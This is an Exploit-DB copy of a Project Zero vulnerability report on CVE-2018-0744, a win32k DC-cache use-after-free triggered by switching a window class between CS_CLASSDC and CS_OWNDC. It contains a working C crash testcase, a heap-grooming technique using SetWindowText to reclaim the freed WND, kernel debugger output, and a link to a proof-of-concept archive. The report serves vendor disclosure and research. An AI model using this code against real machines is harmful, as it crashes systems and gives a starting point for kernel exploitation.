Microsoft Windows win32k - Using SetClassLong to Switch Between CS_CLASSDC and CS_OWNDC Corrupts DC Cache

2018-01-05T00:00:00
ID EDB-ID:43446
Type exploitdb
Reporter Exploit-DB
Modified 2018-01-05T00:00:00

Description

Microsoft Windows win32k - Using SetClassLong to Switch Between CS_CLASSDC and CS_OWNDC Corrupts DC Cache. CVE-2018-0744. Dos exploit for Windows platform

                                        
                                            Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1389&desc=6

Windows maintains a DC cache in win32kbase!gpDispInfo->pdceFirst. If you create multiple windows from a shared class while switching between CS_OWNDC and CS_CLASSDC, you can cause cache list entries to maintain references to free WND structures.

There are two interesting background posts on CS_OWNDC and CS_CLASSDC here:

https://blogs.msdn.microsoft.com/oldnewthing/20060601-06/?p=31003
https://blogs.msdn.microsoft.com/oldnewthing/20060602-00/?p=30993

Here is a minimal testcase:

$ cat dccache.c
#include <windows.h>

#pragma comment(lib, "user32")

int main(int argc, char **argv) {
    WNDCLASSEX WindowClass = {0};
    HWND WindowA, WindowB, WindowC;
    ATOM Atom;

    WindowClass.cbSize         = sizeof(WNDCLASSEX);
    WindowClass.lpfnWndProc    = DefWindowProc;
    WindowClass.lpszClassName  = "Class";

    Atom = RegisterClassEx(&WindowClass);
    WindowA = CreateWindowEx(0, MAKEINTATOM(Atom), "One", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
    SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC);
    WindowB = CreateWindowEx(0, MAKEINTATOM(Atom), "Two", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
    GetDC(WindowA);
    SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC | CS_OWNDC);
    WindowC = CreateWindowEx(0, MAKEINTATOM(Atom), "Three", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);

    return 0;
}

This might take a while to crash though, something has to cause the list to be traversed (e.g. a new window opens) after the freed memory has changed. It can also crash in some very strange places. We can speed the process up by trying to get the allocation ourselves.

First I need to know the size of a WND structure. If you look at the call to HMAllocObject() in win32kfull!xxxCreateWindowEx, you can see it's 240 bytes:

.text:00081BCC _xxxCreateWindowEx@68 proc near
...
.text:00081EE2 push    240             ; _DWORD
.text:00081EE7 push    1               ; _DWORD
.text:00081EE9 push    [ebp+var_12C]   ; _DWORD
.text:00081EEF push    ebx             ; _DWORD
.text:00081EF0 call    ds:__imp__HMAllocObject@16 ; HMAllocObject(x,x,x,x)


A well-known trick to get arbitrary sized allocations from the desktop heap is to use SetWindowText(), you just create a WCHAR string of the required length - good enough for testing.

e.g. SetWindowTextW(Window, L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...");

So my plan is to create a thread to trigger the free, and then try to steal the allocation. See the testcase attached for my code.

This reliably crashes Windows 10 with version 10.0.15063.674, the crash looks like this:

eax=00410041 ebx=00000010 ecx=95423580 edx=95423580 esi=99464440 edi=954004d0
eip=93fb40d8 esp=9dba78f0 ebp=9dba7910 iopl=0         nv up ei pl nz na pe cy
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010207
win32kfull!zzzLockDisplayAreaAndInvalidateDCCache+0xba:
93fb40d8 8b403c          mov     eax,dword ptr [eax+3Ch] ds:0023:0041007d=????????
0: kd> kv
 # ChildEBP RetAddr  Args to Child              
00 9dba7910 93fb2722 00000000 0c6775a3 9dba7b80 win32kfull!zzzLockDisplayAreaAndInvalidateDCCache+0xba (FPO: [Non-Fpo])
01 9dba7afc 93fd1916 0000c1ac 9dba7b74 00000000 win32kfull!xxxCreateWindowEx+0xb56 (FPO: [Non-Fpo])
02 9dba7bc8 81d97397 80000000 0000c1ac 0000c1ac win32kfull!NtUserCreateWindowEx+0x2b0 (FPO: [Non-Fpo])
03 9dba7bc8 77104350 80000000 0000c1ac 0000c1ac nt!KiSystemServicePostCall (FPO: [0,3] TrapFrame @ 9dba7c14)
04 0073f0b8 7497485a 74bae418 80000000 0000c1ac ntdll!KiFastSystemCallRet (FPO: [0,0,0])
05 0073f0bc 74bae418 80000000 0000c1ac 0000c1ac win32u!NtUserCreateWindowEx+0xa (FPO: [17,0,0])
06 0073f394 74badcff 0073f3e0 00000000 80000000 USER32!VerNtUserCreateWindowEx+0x22b (FPO: [Non-Fpo])
07 0073f468 74baeaf8 00cc1010 00000000 80000000 USER32!CreateWindowInternal+0x153 (FPO: [Non-Fpo])
08 0073f4a8 00cb1173 00000000 0000c1ac 00cc1010 USER32!CreateWindowExA+0x38 (FPO: [Non-Fpo])

So let's dump the DC Cache and see what it looks like, an entry looks something like:

typedef struct _DCE {
    PDCE    pdceNext;
    HANDLE  hDC;
    PWND    pwndOrg;
    PWND    pwndClip;
    ...
} DCE, *PDCE;

# Make $t0 gpDispInfo->pdceFirst
0: kd> r $t0=poi(poi(win32kbase!gpDispInfo)+8)

# Now dump the whole list:
0: kd> .while (@$t0) { .printf "dce %p ->pwndOrg %p\n",@$t0,poi(@$t0+8); r @$t0=poi(@$t0) }
dce 99464440 ->pwndOrg 95423580
dce 922140e8 ->pwndOrg 00000000
dce 9239d638 ->pwndOrg 00000000
dce 9239beb0 ->pwndOrg 00000000
dce 99510540 ->pwndOrg 9541ede8
dce 92274178 ->pwndOrg 954004d0
dce 9223d2b0 ->pwndOrg 954004d0
dce 922050e8 ->pwndOrg 945504d0

So my theory is that one of these WND pointers is actually a bad reference, and
look at this:
0: kd> du 95423580
95423580  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
954235c0  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
95423600  "AAAAAAAAAAA"

There is the text I set via SetWindowText().

(The testcase I sent Microsoft triggered a couple of other BSOD I want fixed as well. I'm hoping whoever gets assigned this bug will just fix them, they're dead easy oneline fixes).


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43446.zip